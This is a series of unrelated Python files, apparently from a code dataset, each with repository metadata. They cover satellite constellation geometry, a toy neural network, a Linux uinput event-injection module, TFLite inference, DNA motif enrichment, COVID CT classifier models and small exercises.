def nu(self, i_plane, i_sat):
"""
Args:
i_plane (int) : index of the plane
i_sat (int) : index of the satellite
Return:
float : True anomaly in radians
"""
return (
2 * np.pi / self.per_plane * i_sat
+ self.spacing * 2 * (self.raan(i_plane) - self.raan0) / self.per_plane
)
def iter_raan(self):
for i in range(self.planes):
yield self.raan(i)
def iter_nu(self, plane):
for i in range(self.per_plane):
yield self.nu(plane, i)
def iter_fleet(self):
for i, raan in enumerate(self.iter_raan()):
for nu in self.iter_nu(i):
yield raan, nu
class WalkerDelta(WalkerStar):
"""Definition of the Walkek Delta constellation
Example: Galileo is a Walker Delta 24/3/1 constellation
so to generate this, one has to call ``WalkerDelta(24, 3, 1)``
"""
def raan(self, i_plane):
"""
Args:
i_plane (int) : index of the plane
Return:
float : Right Ascension of Ascending Node in radians
"""
return 2 * np.pi / self.planes * i_plane + self.raan0
def nu(self, i_plane, i_sat):
"""
Args:
i_plane (int) : index of the plane
i_sat (int) : index of the satellite
Return:
float : True anomaly in radians
"""
return (
2 * np.pi / self.per_plane * i_sat
+ self.spacing * (self.raan(i_plane) - self.raan0) / self.per_plane
)
| true |
d8553b937959804b40119f9a41ee59185af03770 | Python | RonohP/AI | /Neural_Network/ANN ML.py | UTF-8 | 3,820 | 3.671875 | 4 | [] | no_license | import numpy
# import random
# import os
# learning rate
lr = 1
# weights
# weights[w1j, w1i, w2j, w2i, w3j, w3i, Wjk, Wik]
weights = [0.2, 0.1, 0.3, 0.1, 0.2, 0.1, 0.5, 0.1]
# maximum and minimum values of the data provided
max_value = 70
min_value = 15
# a,b and c are inputs
# d is output
def back(a, b, c, d):
input1 = ((a - min_value) / (max_value - min_value))
input2 = ((b - min_value) / (max_value - min_value))
input3 = ((c - min_value) / (max_value - min_value))
output = ((d - min_value) / (max_value - min_value))
# input into node j
j = (input1 * weights[0]) + (input2 * weights[2]) + (input3 * weights[4])
output_j = 1 / (1 + numpy.exp(-j)) # sigmoid function
# input into node i
i = (input1 * weights[1]) + (input2 * weights[3]) + (input3 * weights[5])
output_i = 1 / (1 + numpy.exp(-i)) # sigmoid function
# input of k
k = (output_j * weights[6]) + (output_i * weights[7])
# output from k
output_k = 1 / (1 + numpy.exp(-k))
if output > 0:
pass
else:
# error value at node k
error = (output - output_k) * output_k * (1 - output_k)
# errors for the hidden layers
error_j = error * weights[6] * output_j * (1 - output_j)
error_i = error * weights[7] * output_i * (1 - output_i)
hidden_layer = numpy.array([error_j, error_i])
print('Updated hidden layers matrix:', hidden_layer)
# delta weight updates
# updated weights connected to j
weights[0] += lr * error * output_j
weights[2] += lr * error * output_j
weights[4] += lr * error * output_j
# print('Updated weights connected to J weights(w1j, w2j, w3j):(', weights[0], weights[2], weights[4], ')')
# updated weights connected to i
weights[1] += lr * error * output_i
weights[3] += lr * error * output_i
weights[5] += lr * error * output_i
# print('Updated weights connected to I weights(w1i, w2i, w3i):(', weights[1], weights[3], weights[5], ')')
weight = numpy.array([[weights[0], weights[2], weights[4]],
[weights[1], weights[3], weights[5]]])
print('Updated Outer Layer Weight Matrix:\n', weight)
def main():
# a loop for repeating every situation several times
# learning stage
for i in range(1):
back(30, 40, 50, 20) # Epoch1
back(40, 50, 20, 15) # Epoch2
back(50, 20, 15, 60) # Epoch3
back(20, 15, 60, 70) # Epoch4
back(15, 60, 70, 50) # Epoch5
back(60, 70, 50, 40) # Epoch6
# enter values prompt
print('Enter x: ')
x = int(input())
print('Enter y: ')
y = int(input())
print('Enter z')
z = int(input())
# convert the data entered to a value between o and 1
# new value = ((original value - minimum value) / (maximum value - minimum value))
input1 = ((x - min_value) / (max_value - min_value))
input2 = ((y - min_value) / (max_value - min_value))
input3 = ((z - min_value) / (max_value - min_value))
# print('\n x is ', input1, '\n y is', input2, '\n z is', input3)
# input into node j
j = (input1 * weights[0]) + (input2 * weights[2]) + (input3 * weights[4])
# input into node i
i = (input1 * weights[1]) + (input2 * weights[3]) + (input3 * weights[5])
# print('\n input into node j', j, '\n input into node i', i)
output_j = 1 / (1 + numpy.exp(-j)) # sigmoid function
output_i = 1 / (1 + numpy.exp(-i)) # sigmoid function
# print('\n output from j', output_j, '\n output from i', output_i)
# input of k
k = (output_j * weights[6]) + (output_i * weights[7])
# output from k
output_k = 1 / (1 + numpy.exp(-k))
print('\n output from k', output_k)
if __name__ == '__main__':
main()
| true |
8bad661b1a6ffb4facb6ee6322eb219f7857cfcd | Python | victorgevaerd/app-prime-numbers-bridge-2021.1 | /server/src/settings.py | UTF-8 | 751 | 3.109375 | 3 | [] | no_license | import sys
from os import getenv
from dotenv import load_dotenv
load_dotenv()
with_error = False
if getenv('PORT') is None:
print('Variável "PORT" não definida!. Defina no arquivo servidor/.env')
print('Exemplo: PORT=3000')
with_error = True
if getenv('DEBUG') is None:
print('Variável "DEBUG" não definida!. Defina no arquivo servidor/.env')
print('Exemplo: DEBUG=True')
with_error = True
if with_error:
raise SystemExit('Variáveis de ambiente não definidas!')
try:
PORT = int(getenv('PORT'))
except ValueError:
raise SystemExit('Variável PORTA deve ser um número natural!')
try:
DEBUG = bool(getenv('DEBUG'))
except ValueError:
raise SystemExit('Variável DEBUG deve ser do tipo boolean!')
| true |
5a49c4ec635f091da212d6d51f0e9d88e5ef5115 | Python | sea-lab-wm/burt | /crashscope/lib/python-scripts/evdev/uinput.py | UTF-8 | 6,979 | 2.625 | 3 | [
"Apache-2.0"
] | permissive | # encoding: utf-8
import os
import stat
import time
from evdev import _uinput
from evdev import ecodes, util, device
class UInputError(Exception):
pass
class UInput(object):
'''
A userland input device and that can inject input events into the
linux input subsystem.
'''
__slots__ = (
'name', 'vendor', 'product', 'version', 'bustype',
'events', 'devnode', 'fd', 'device',
)
def __init__(self,
events=None,
name='py-evdev-uinput',
vendor=0x1, product=0x1, version=0x1, bustype=0x3,
devnode='/dev/uinput'):
'''
:param events: the event types and codes that the uinput
device will be able to inject - defaults to all
key codes.
:type events: dictionary of event types mapping to lists of
event codes.
:param name: the name of the input device.
:param vendor: vendor identifier.
:param product: product identifier.
:param version: version identifier.
:param bustype: bustype identifier.
.. note:: If you do not specify any events, the uinput device
will be able to inject only ``KEY_*`` and ``BTN_*``
event codes.
'''
self.name = name #: Uinput device name.
self.vendor = vendor #: Device vendor identifier.
self.product = product #: Device product identifier.
self.version = version #: Device version identifier.
self.bustype = bustype #: Device bustype - eg. ``BUS_USB``.
self.devnode = devnode #: Uinput device node - eg. ``/dev/uinput/``.
if not events:
events = {ecodes.EV_KEY: ecodes.keys.keys()}
# the min, max, fuzz and flat values for the absolute axis for
# a given code
absinfo = []
self._verify()
#: Write-only, non-blocking file descriptor to the uinput device node.
self.fd = _uinput.open(devnode)
# set device capabilities
for etype, codes in events.items():
for code in codes:
# handle max, min, fuzz, flat
if isinstance(code, (tuple, list, device.AbsInfo)):
# flatten (ABS_Y, (0, 255, 0, 0)) to (ABS_Y, 0, 255, 0, 0)
f = [code[0]]; f += code[1]
absinfo.append(f)
code = code[0]
#:todo: a lot of unnecessary packing/unpacking
_uinput.enable(self.fd, etype, code)
# create uinput device
_uinput.create(self.fd, name, vendor, product, version, bustype, absinfo)
#: An :class:`InputDevice <evdev.device.InputDevice>` instance
#: for the fake input device. ``None`` if the device cannot be
#: opened for reading and writing.
self.device = self._find_device()
def __enter__(self):
return self
def __exit__(self, type, value, tb):
if hasattr(self, 'fd'):
self.close()
def __repr__(self):
# :todo:
v = (repr(getattr(self, i)) for i in
('name', 'bustype', 'vendor', 'product', 'version'))
return '{}({})'.format(self.__class__.__name__, ', '.join(v))
def __str__(self):
msg = ('name "{}", bus "{}", vendor "{:04x}", product "{:04x}", version "{:04x}"\n'
'event types: {}')
evtypes = [i[0] for i in self.capabilities(True).keys()]
msg = msg.format(self.name, ecodes.BUS[self.bustype],
self.vendor, self.product,
self.version, ' '.join(evtypes))
return msg
def close(self):
# close the associated InputDevice, if it was previously opened
if self.device is not None:
self.device.close()
# destroy the uinput device
if self.fd > -1:
_uinput.close(self.fd)
self.fd = -1
def write_event(self, event):
'''
Inject an input event into the input subsystem. Events are
queued until a synchronization event is received.
:param event: InputEvent instance or an object with an
``event`` attribute (:class:`KeyEvent
<evdev.events.KeyEvent>`, :class:`RelEvent
<evdev.events.RelEvent>` etc).
Example::
ev = InputEvent(1334414993, 274296, ecodes.EV_KEY, ecodes.KEY_A, 1)
ui.write_event(ev)
'''
if hasattr(event, 'event'):
event = event.event
self.write(event.type, event.code, event.value)
def write(self, etype, code, value):
'''
Inject an input event into the input subsystem. Events are
queued until a synchronization event is received.
:param etype: event type (eg. ``EV_KEY``).
:param code: event code (eg. ``KEY_A``).
:param value: event value (eg. 0 1 2 - depends on event type).
Example::
ui.write(e.EV_KEY, e.KEY_A, 1) # key A - down
ui.write(e.EV_KEY, e.KEY_A, 0) # key A - up
'''
_uinput.write(self.fd, etype, code, value)
def syn(self):
'''
Inject a ``SYN_REPORT`` event into the input subsystem. Events
queued by :func:`write()` will be fired. If possible, events
will be merged into an 'atomic' event.
'''
_uinput.write(self.fd, ecodes.EV_SYN, ecodes.SYN_REPORT, 0)
def capabilities(self, verbose=False, absinfo=True):
'''See :func:`capabilities <evdev.device.InputDevice.capabilities>`.'''
if self.device is None:
raise UInputError('input device not opened - cannot read capabilites')
return self.device.capabilities(verbose, absinfo)
def _verify(self):
'''
Verify that an uinput device exists and is readable and writable
by the current process.
'''
try:
m = os.stat(self.devnode)[stat.ST_MODE]
if not stat.S_ISCHR(m):
raise
except (IndexError, OSError):
msg = '"{}" does not exist or is not a character device file '\
'- verify that the uinput module is loaded'
raise UInputError(msg.format(self.devnode))
if not os.access(self.devnode, os.W_OK):
msg = '"{}" cannot be opened for writing'
raise UInputError(msg.format(self.devnode))
if len(self.name) > _uinput.maxnamelen:
msg = 'uinput device name must not be longer than {} characters'
raise UInputError(msg.format(_uinput.maxnamelen))
def _find_device(self):
#:bug: the device node might not be immediately available
time.sleep(0.1)
for fn in util.list_devices('/dev/input/'):
d = device.InputDevice(fn)
if d.name == self.name:
return d
| true |
9e1da42e7295e4cace5186d8b8bbf852a7aff1d6 | Python | AnatolyDomrachev/karantin | /is28/paranina28/lab3/pr3.py | UTF-8 | 92 | 3.734375 | 4 | [] | no_license | x = int(input("номер дня в годy "))
x = x%7
if x == 0:
print(7)
else:
print(x) | true |
ee2bbf7c1e4317c398482eab21d1ee65220b378a | Python | msfurr/coral | /Coral_Test.py | UTF-8 | 1,342 | 2.9375 | 3 | [] | no_license | """
WORKING VERSION
Purpose:
Performs classification on existing raw data to better understand current
model
Outputs:
List of class results produced by TFLite model inference from sample data
"""
import numpy as np
from tflite_runtime.interpreter import Interpreter
import time
import pandas as pd
#%%
def main():
# Gather data from text file
data = np.loadtxt('X_test.txt')
data = np.float32([data])
# Setup interpreter for inference
interpreter = Interpreter(model_path = "model_4.tflite")
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
start = time.time()
results= []
for i in range(0, len(data[0])):
input_data = data[0][[i]]
print(input_data)
interpreter.set_tensor(input_details[0]['index'], input_data)
classStart = time.time()
interpreter.invoke()
results.append(np.argmax(interpreter.get_tensor(output_details[0]['index'])))
classEnd = time.time()
duration = time.time() - start
print(duration / len(data[0]))
print(classEnd - classStart)
return results
results = main()
export_csv = pd.DataFrame(results).to_csv(r'/home/mendel/coral/coral_results.csv', header = True, index = None)
| true |
b638d4c1c5e9cda29ee4e93c2bdd02a869ebdcac | Python | KevinChen1994/leetcode-algorithm | /problem-list/DP/279.perfect-squares.py | UTF-8 | 1,188 | 3.8125 | 4 | [] | no_license | # !usr/bin/env python
# -*- coding:utf-8 _*-
# author:chenmeng
# datetime:2021/3/3 16:45
'''
solution: 最开始的思路是先将当前的数开平方,然后用当前的数减去最大的平方和,这样就可以通过dp去获取平方和的次数再加1就好了。
也就是dp[i] = dp[i-j**2] + 1,j是最大的平方和,j<i。但是这样就可能忽略一点,没有取最少的次数。例如:dp[12] =dp[3] + 1 = 4.
这样不是最少的,所以需要进行优化。
首先需要在最小的平方和之内一个一个去遍历,找到一直去计算dp[i] = min(dp[i], dp[j] + 1)。但是这样会超时。
所以需要提前计算好所有的平方和,存储起来,以减少运算。
'''
class Solution:
def numSquares(self, n: int) -> int:
dp = [float('inf') for _ in range(n + 1)]
dp[0] = 0
squares = [i * i for i in range(1, int(n ** 0.5) + 1)]
for i in range(1, n + 1):
for j in squares:
if j > i:
break
dp[i] = min(dp[i], dp[i - j] + 1)
return dp[-1]
if __name__ == '__main__':
solution = Solution()
n = 12
print(solution.numSquares(n))
| true |
b5f8151cc92560890102bfb834208ac4ade5333d | Python | boberrey/sequence_analysis | /pattern_enrichment.py | UTF-8 | 7,321 | 2.75 | 3 | [] | no_license | #!/usr/bin/env python
"""
Calculate enrichment statistics for two sets of fasta files
Inputs:
two fasta files to compare
file containing patterns to check
Outputs:
pickled dictionary of pattern enrichments
Ben Ober-Reynolds
"""
import os
import sys
import re
import time
import argparse
import numpy as np
import pandas as pd
import pickle
from Bio import SeqIO
from joblib import Parallel, delayed
def main():
# set up command line argument parser
parser = argparse.ArgumentParser(description='Calculate motif densities \
for a target and a background set of fastas.')
group = parser.add_argument_group('required arguments:')
group.add_argument('-fi', '--fasta_of_interest', required=True,
help='file containing clusters of interest')
group.add_argument('-fb', '--background_fasta', required=True,
help='file containing background clusters')
group.add_argument('-pf', '--pattern_file', required=True,
help='file containing patterns to check for. Format: \
{pattern name}\\t{regex_pattern}')
group = parser.add_argument_group('optional arguments')
group.add_argument('-od', '--output_directory', default=".",
help='output directory for statistics file and figures. \
Default is current directory')
group.add_argument('-op', '--output_prefix', default="enrichment",
help='output prefix for results file and figures')
group.add_argument('-isn', '--interesting_seq_name',
default="Sequences of Interest",
help='The name of the sequence of interest pool. Default is \
"Sequences of Interest"')
group.add_argument('-bsn', '--background_seq_name',
default="Background Sequences", help='The name of the background \
sequence pool. Default is "Background Sequences"')
group.add_argument('-rc', '--reverse_comp', default="y",
help='also calculate enrichment in reverse complement of each pool \
[y/n]? Default is y.')
group.add_argument('-nb', '--num_bootstraps', type=int, default=1000,
help='number of times to resample pools for enrichment calculation. \
Default is 1000.')
group.add_argument('-n', '--num_cores', type=int, default=1,
help='number of cores to use for bootstrapping.')
# print help if no arguments provided
if len(sys.argv) <= 1:
parser.print_help()
sys.exit()
# parse command line arguments
args = parser.parse_args()
numCores = args.num_cores
# Pre-defined variables, constants, and settings
input_file_format = 'fasta'
rev_c_tag = "Rev-Comp"
output_prefix = time.strftime("%Y%m%d") + "_" + args.output_prefix
pickle_file_ext = "p"
# Do some error checking before running this long script:
output_dir = args.output_directory
if not os.path.isdir(output_dir):
print("Error: invalid output directory. Exiting...")
sys.exit()
# Read in files:
seqs_of_interest = read_fasta(args.fasta_of_interest, input_file_format)
background_seqs = read_fasta(args.background_fasta, input_file_format)
pattern_dict = read_pattern_file(args.pattern_file)
# Find smallest pool size:
pool_size = min([len(seqs_of_interest), len(background_seqs)])
# seq pool dict:
seq_pool_dict = {args.interesting_seq_name: seqs_of_interest,
args.background_seq_name: background_seqs}
# Results dictionary:
density_result_dict = {}
for pname in pattern_dict.keys():
density_result_dict[pname] = {}
# compare to reverse complement?
if args.reverse_comp == 'y':
interesting_seq_rc_name = args.interesting_seq_name + " " + rev_c_tag
background_seq_rc_name = args.background_seq_name + " " + rev_c_tag
rc_seqs_of_interest = reverse_comp(seqs_of_interest)
rc_background_seqs = reverse_comp(background_seqs)
seq_pool_dict[interesting_seq_rc_name] = rc_seqs_of_interest
seq_pool_dict[background_seq_rc_name] = rc_background_seqs
# calculate motif density for each pattern
if numCores > 1:
with Parallel(n_jobs=numCores, verbose=10) as parallel:
for pname in pattern_dict.keys():
for pool_name in seq_pool_dict.keys():
densities = []
print("Calculating density of pattern '{}' in pool '{}'\
".format(pname, pool_name))
densities = parallel(delayed(calc_resampled_motif_density)\
(seq_pool_dict[pool_name], pool_size, pattern_dict[pname])
for i in range(args.num_bootstraps))
density_result_dict[pname][pool_name] = densities
else:
for pname in pattern_dict.keys():
for pool_name in seq_pool_dict.keys():
densities = []
print("Calculating density of pattern '{}' in pool '{}'\
".format(pname, pool_name))
densities = [calc_resampled_motif_density(
seq_pool_dict[pool_name], pool_size, pattern_dict[pname])
for i in range(args.num_bootstraps)]
density_result_dict[pname][pool_name] = densities
# Dump results to pickle for latter replotting
with open(output_dir + '/' + output_prefix + '.' + pickle_file_ext, 'wb') as f:
pickle.dump(density_result_dict, f)
def read_fasta(filename, input_file_format):
"""
Read in a fasta file, and return sequences as a list.
Input: fasta filename
Output: sequence array
"""
fasta_list = []
with open(filename, 'r') as f:
for seq_rec in SeqIO.parse(f, input_file_format):
seq_rec = seq_rec.upper()
fasta_list.append(str(seq_rec.seq))
return np.array(fasta_list)
def read_pattern_file(filename):
"""
Read in a pattern file. Note that pattern files must be two-column,
tab-delimited files with the first column being the pattern name, and
the second column the regular expression defining that pattern.
"""
pattern_dict = {}
with open(filename, 'r') as f:
for line in f:
pname, reg_exp = line.strip().split('\t')
reg_exp = re.compile(reg_exp)
pattern_dict[pname] = reg_exp
return pattern_dict
def reverse_comp(fasta_array):
"""
Reverse complement a list of sequences
Input: list of sequences
Output: reverse complement of same sequence list
"""
trans_table = str.maketrans('AGCT', 'TCGA')
rev_list = []
for seq in fasta_array:
rev_list.append(seq.translate(trans_table)[::-1])
return np.array(rev_list)
def calc_resampled_motif_density(seq_array, samp_size, regex):
"""
Calculate the length-normalized density of a specific regular
expression pattern in a resampled sequence pool.
Inputs: list of sequences, number of seqs to draw, regular expression pattern
Output: length-normalized motif density
"""
resampled_pool = np.random.choice(seq_array, size=samp_size, replace=True)
total_seq_space = 0
patterns_found = 0
for seq in resampled_pool:
patterns_found += len(re.findall(regex, seq))
total_seq_space += len(seq)
return patterns_found/total_seq_space
if __name__ == '__main__':
main()
| true |
9f2af1e4207ea618de1e7e42c6e3fa313343c725 | Python | cvlinks/UncertaintyFuseNet-for-COVID-19-Classification | /models.py | UTF-8 | 11,831 | 2.53125 | 3 | [] | no_license | import tensorflow as tf
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input, Dense, Flatten, Dropout, BatchNormalization, Concatenate
from tensorflow.keras.layers import Conv2D, SeparableConv2D, MaxPool2D
from tensorflow.keras.callbacks import ModelCheckpoint, ReduceLROnPlateau, EarlyStopping
def get_dropout(input_tensor, rate, mc=False):
if mc:
return Dropout(rate=rate)(input_tensor, training=True)
else:
return Dropout(rate=rate)(input_tensor)
# Our Proposed Fusion Model:
def fusion_model(mc, image_size=150, lr=0.00005):
inputs = Input(shape=(image_size, image_size, 1))
input2 = tf.stack([inputs, inputs, inputs], axis=3)[:, :, :, :, 0]
vgg_model = tf.keras.applications.VGG16(weights='imagenet',
include_top=False,
input_shape=(image_size, image_size, 3))
vgg_model.trainable = False
vgg_feature = vgg_model(input2)
# First conv block
conv1 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(inputs)
conv1 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(conv1)
conv1 = MaxPool2D(pool_size=(2, 2))(conv1)
# Second conv block
conv2 = SeparableConv2D(filters=32, kernel_size=(3, 3), activation='relu', padding='same')(conv1)
conv2 = SeparableConv2D(filters=32, kernel_size=(3, 3), activation='relu', padding='same')(conv2)
conv2 = BatchNormalization()(conv2)
conv2 = MaxPool2D(pool_size=(2, 2))(conv2)
# Third conv block
conv3 = SeparableConv2D(filters=64, kernel_size=(3, 3), activation='relu', padding='same')(conv2)
conv3 = SeparableConv2D(filters=64, kernel_size=(3, 3), activation='relu', padding='same')(conv3)
conv3 = BatchNormalization()(conv3)
conv3 = MaxPool2D(pool_size=(2, 2))(conv3)
# Fourth conv block
conv4 = SeparableConv2D(filters=64, kernel_size=(3, 3), activation='relu', padding='same')(conv3)
conv4 = SeparableConv2D(filters=64, kernel_size=(3, 3), activation='relu', padding='same', name='target_layer')(
conv4)
conv4 = BatchNormalization()(conv4)
conv4 = MaxPool2D(pool_size=(2, 2))(conv4)
conv4 = get_dropout(conv4, rate=0.2, mc=mc)
# Fifth conv block
conv5 = SeparableConv2D(filters=64, kernel_size=(3, 3), activation='relu', padding='same')(conv4)
conv5 = SeparableConv2D(filters=64, kernel_size=(3, 3), activation='relu', padding='same')(conv5)
conv5 = BatchNormalization()(conv5)
conv5 = MaxPool2D(pool_size=(2, 2))(conv5)
conv5 = get_dropout(conv5, rate=0.2, mc=mc)
concatenated_tensor = Concatenate(axis=1)(
[Flatten()(conv3), Flatten()(conv4), Flatten()(conv5), Flatten()(vgg_feature)])
# FC layer
x = Flatten()(concatenated_tensor)
x = Dense(units=512, activation='relu')(x)
x = get_dropout(x, rate=0.7, mc=mc)
x = Dense(units=128, activation='relu')(x)
x = get_dropout(x, rate=0.5, mc=mc)
x = Dense(units=64, activation='relu')(x)
x = get_dropout(x, rate=0.3, mc=mc)
# Output layer
output = Dense(3, activation='softmax')(x)
METRICS = [
tf.keras.metrics.Precision(name='precision'),
tf.keras.metrics.Recall(name='recall'),
tf.keras.metrics.AUC(name='auc')]
# Creating model and compiling
model = Model(inputs=inputs, outputs=output)
adam = tf.keras.optimizers.Adam(lr=lr)
model.compile(optimizer=adam, loss='categorical_crossentropy', metrics=['accuracy', METRICS])
# Callbacks
if mc:
mcheck = ModelCheckpoint('model_covid_mc.h5', monitor='val_accuracy', mode='max', verbose=1,
save_best_only=True)
else:
mcheck = ModelCheckpoint('model_covid_simple.h5', monitor='val_accuracy', mode='max', verbose=1,
save_best_only=True)
reduce_lr = ReduceLROnPlateau(monitor='val_accuracy', factor=0.8, verbose=1, patience=5)
es = EarlyStopping(monitor='val_accuracy', mode='max', verbose=0, patience=30)
callbacks = [reduce_lr, es, mcheck]
return model, callbacks
# Simple CNN Model:
def simple_cnn_model(mc, image_size=150, lr=0.00005):
inputs = Input(shape=(image_size, image_size, 1))
conv1 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(inputs)
conv2 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(conv1)
conv2 = MaxPool2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(filters=32, kernel_size=(3, 3), activation='relu', padding='same')(conv2)
conv4 = Conv2D(filters=32, kernel_size=(3, 3), activation='relu', padding='same')(conv3)
conv4 = BatchNormalization()(conv4)
conv4 = MaxPool2D(pool_size=(2, 2))(conv4)
conv5 = Conv2D(filters=64, kernel_size=(3, 3), activation='relu', padding='same')(conv4)
conv5 = BatchNormalization()(conv5)
conv5 = get_dropout(conv5, rate=0.2, mc=mc)
# FC layer
x = Flatten()(conv5)
x = Dense(units=128, activation='relu')(x)
x = get_dropout(x, rate=0.7, mc=mc)
x = Dense(units=64, activation='relu')(x)
x = get_dropout(x, rate=0.5, mc=mc)
# Output layer
output = Dense(3, activation='softmax')(x)
METRICS = [
tf.keras.metrics.Precision(name='precision'),
tf.keras.metrics.Recall(name='recall'),
tf.keras.metrics.AUC(name='auc')]
# Creating model and compiling
model = Model(inputs=inputs, outputs=output)
adam = tf.keras.optimizers.Adam(lr=lr)
model.compile(optimizer=adam, loss='categorical_crossentropy', metrics=['accuracy', METRICS])
# Callbacks
if mc:
mcheck = ModelCheckpoint('simple_cnn_model_covid_mc.h5', monitor='val_accuracy', mode='max', verbose=1,
save_best_only=True)
else:
mcheck = ModelCheckpoint('simple_cnn_model_covid_simple.h5', monitor='val_accuracy', mode='max', verbose=1,
save_best_only=True)
reduce_lr = ReduceLROnPlateau(monitor='val_accuracy', factor=0.8, verbose=1, patience=5)
es = EarlyStopping(monitor='val_accuracy', mode='max', verbose=0, patience=30)
callbacks = [reduce_lr, es, mcheck]
return model, callbacks
# Multi-headed Model:
def multi_headed_model(mc, image_size=150, lr=0.00001):
inputs = Input(shape=(image_size, image_size, 1))
conv1 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(inputs)
conv1 = Conv2D(filters=8, kernel_size=(3, 3), activation='relu', padding='same')(conv1)
conv1 = BatchNormalization()(conv1)
conv1 = MaxPool2D(pool_size=(2, 2))(conv1)
conv1 = get_dropout(conv1, rate=0.2, mc=mc)
conv2 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(inputs)
conv2 = Conv2D(filters=8, kernel_size=(3, 3), activation='relu', padding='same')(conv2)
conv2 = BatchNormalization()(conv2)
conv2 = MaxPool2D(pool_size=(2, 2))(conv2)
conv2 = get_dropout(conv2, rate=0.2, mc=mc)
conv3 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(inputs)
conv3 = Conv2D(filters=8, kernel_size=(3, 3), activation='relu', padding='same')(conv3)
conv3 = BatchNormalization()(conv3)
conv3 = MaxPool2D(pool_size=(2, 2))(conv3)
conv3 = get_dropout(conv3, rate=0.2, mc=mc)
concatenated_tensor = Concatenate(axis=1)([Flatten()(conv1), Flatten()(conv2), Flatten()(conv3)])
# FC layer
x = Flatten()(concatenated_tensor)
x = Dense(units=128, activation='relu')(x)
x = get_dropout(x, rate=0.7, mc=mc)
x = Dense(units=64, activation='relu')(x)
x = get_dropout(x, rate=0.5, mc=mc)
# Output layer
output = Dense(3, activation='softmax')(x)
METRICS = [
tf.keras.metrics.Precision(name='precision'),
tf.keras.metrics.Recall(name='recall'),
tf.keras.metrics.AUC(name='auc')]
# Creating model and compiling
model = Model(inputs=inputs, outputs=output)
adam = tf.keras.optimizers.Adam(lr=lr)
model.compile(optimizer=adam, loss='categorical_crossentropy', metrics=['accuracy', METRICS])
# Callbacks
if mc:
mcheck = ModelCheckpoint('multi_headed_model_covid_mc.h5', monitor='val_accuracy', mode='max', verbose=1,
save_best_only=True)
else:
mcheck = ModelCheckpoint('multi_headed_model_covid_simple.h5', monitor='val_accuracy', mode='max', verbose=1,
save_best_only=True)
reduce_lr = ReduceLROnPlateau(monitor='val_accuracy', factor=0.8, verbose=1, patience=5)
es = EarlyStopping(monitor='val_accuracy', mode='max', verbose=0, patience=30)
callbacks = [reduce_lr, es, mcheck]
return model, callbacks
# Truncated Models Used in t-SNE:
def simple_cnn_trunc_model(trained_model, mc, image_size=150, lr=0.00005):
inputs = Input(shape=(image_size, image_size, 1))
conv1 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(inputs)
conv2 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(conv1)
conv2 = MaxPool2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(filters=32, kernel_size=(3, 3), activation='relu', padding='same')(conv2)
conv4 = Conv2D(filters=32, kernel_size=(3, 3), activation='relu', padding='same')(conv3)
conv4 = BatchNormalization()(conv4)
conv4 = MaxPool2D(pool_size=(2, 2))(conv4)
conv5 = Conv2D(filters=64, kernel_size=(3, 3), activation='relu', padding='same')(conv4)
conv5 = BatchNormalization()(conv5)
conv5 = get_dropout(conv5, rate=0.2, mc=mc)
# Output layer
x = Flatten()(conv5)
x = Dense(units=128, activation='relu')(x)
output = x
# Creating model and compiling
model = Model(inputs=inputs, outputs=output)
adam = tf.keras.optimizers.Adam(lr=lr)
model.compile(optimizer=adam, loss='categorical_crossentropy')
for i, layer in enumerate(model.layers):
layer.set_weights(trained_model.layers[i].get_weights())
model.compile(optimizer=adam, loss='categorical_crossentropy')
return model
def multi_headed_trunc_model(trained_model, mc, image_size=150, lr=0.00001):
inputs = Input(shape=(image_size, image_size, 1))
conv1 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(inputs)
conv1 = Conv2D(filters=8, kernel_size=(3, 3), activation='relu', padding='same')(conv1)
conv1 = BatchNormalization()(conv1)
conv1 = MaxPool2D(pool_size=(2, 2))(conv1)
conv1 = get_dropout(conv1, rate=0.2, mc=mc)
conv2 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(inputs)
conv2 = Conv2D(filters=8, kernel_size=(3, 3), activation='relu', padding='same')(conv2)
conv2 = BatchNormalization()(conv2)
conv2 = MaxPool2D(pool_size=(2, 2))(conv2)
conv2 = get_dropout(conv2, rate=0.2, mc=mc)
conv3 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(inputs)
conv3 = Conv2D(filters=8, kernel_size=(3, 3), activation='relu', padding='same')(conv3)
conv3 = BatchNormalization()(conv3)
conv3 = MaxPool2D(pool_size=(2, 2))(conv3)
conv3 = get_dropout(conv3, rate=0.2, mc=mc)
concatenated_tensor = Concatenate(axis=1)([Flatten()(conv1), Flatten()(conv2), Flatten()(conv3)])
# Output layer
x = Flatten()(concatenated_tensor)
x = Dense(units=128, activation='relu')(x)
output = x
# Creating model and compiling
model = Model(inputs=inputs, outputs=output)
adam = tf.keras.optimizers.Adam(lr=lr)
model.compile(optimizer=adam, loss='categorical_crossentropy')
for i, layer in enumerate(model.layers):
layer.set_weights(trained_model.layers[i].get_weights())
model.compile(optimizer=adam, loss='categorical_crossentropy')
return model
| true |
4f462c4e21d1be5a397c854eb0091190ce4a94e6 | Python | SamAstro/codingame | /contests/hypersonic/ligue_bois_1.py | UTF-8 | 14,330 | 2.9375 | 3 | [] | no_license | #!/opt/local/bin/python
"""
BOT FOR THE 'LIGUE BOIS 1' OF THE 'HYPERSONIC' CONTEST
Version: 1.1
Created: 09/25/2016
Compiler: python3.5
Author: Dr. Samia Drappeau (SD), drappeau.samia@gmail.com
Notes:
"""
import sys
import math
import numpy as np
import random
# Flags
isHeroInDanger = False
isUpClose = False
isFirstTurn = True
isFirstBomb = True
# Reproducing randomness -- FOR DEBUG ONLY
random.seed(9001)
##### FUNCTIONS #####
def distance(hero, cx, cy):
distx = math.sqrt((cx - hero.x)**2)
disty = math.sqrt((cy - hero.y)**2)
return distx, disty
def find_crate(crates, crates_bombs, random=True):
